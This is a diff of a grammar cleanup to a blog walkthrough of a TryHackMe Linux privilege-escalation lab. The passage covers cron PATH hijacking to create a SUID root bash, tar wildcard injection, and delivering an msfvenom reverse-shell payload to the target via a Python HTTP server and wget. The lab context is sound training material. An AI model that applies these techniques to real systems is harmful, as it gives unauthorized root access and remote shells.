dvdmtw98/blog/Post Vault/articles/2021-03-16-tryhackme-linux-privesc.md

 chmod +xs /tmp/rootbash
 ```

-Now whenever cron wants to run overwrite.sh it will run our code (as our code is first in the PATH location) which will in turn spawn an root shell
+Now whenever cron wants to run overwrite.sh it will run our code (as our code is first in the PATH location) which will in turn spawn a root shell

 1. What is the value of the PATH variable in /etc/crontab?**

 > /home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

-### Task 10 : Cron Jobs - Wildcards
+### Task 10: Cron Jobs - Wildcards

-Lets view the content of the other scheduled script.
+Let's view the content of the other scheduled script.

 ![List file Content](images/thm-linux-privesc/file-content.png)

 We can see that the code periodically is making a backup of the entire "/home/user" folder.
-The important point to note here is the \* that is used to represent any file.
+The important point to note here is the "\*" that is used to represent any file.
 This can be exploited if not used correctly.

-We can make files that have the same name as the options (flags) that are provided by the tar utility and tar will consider these files as options not as file names.
+We can make files that have the same name as the options (flags) that are provided by the tar utility and tar will consider these files as options, not as file names.

-Lets create an payload using "msfvenom" that we will make the tar utility execute which should give us an reverse shell.
+Let's create a payload using "msfvenom" that we will make the tar utility execute which should give us a reverse shell.

 ![Create Msfvenom Payload](images/thm-linux-privesc/msfvenom-payload.png)

-Now lets download the generated ELF file onto the target by using Python to host the file and wget to download the file.
+Now let's download the generated ELF file onto the target by using Python to host the file and wget to download the file.

 ```
 python3 -m http.server 1234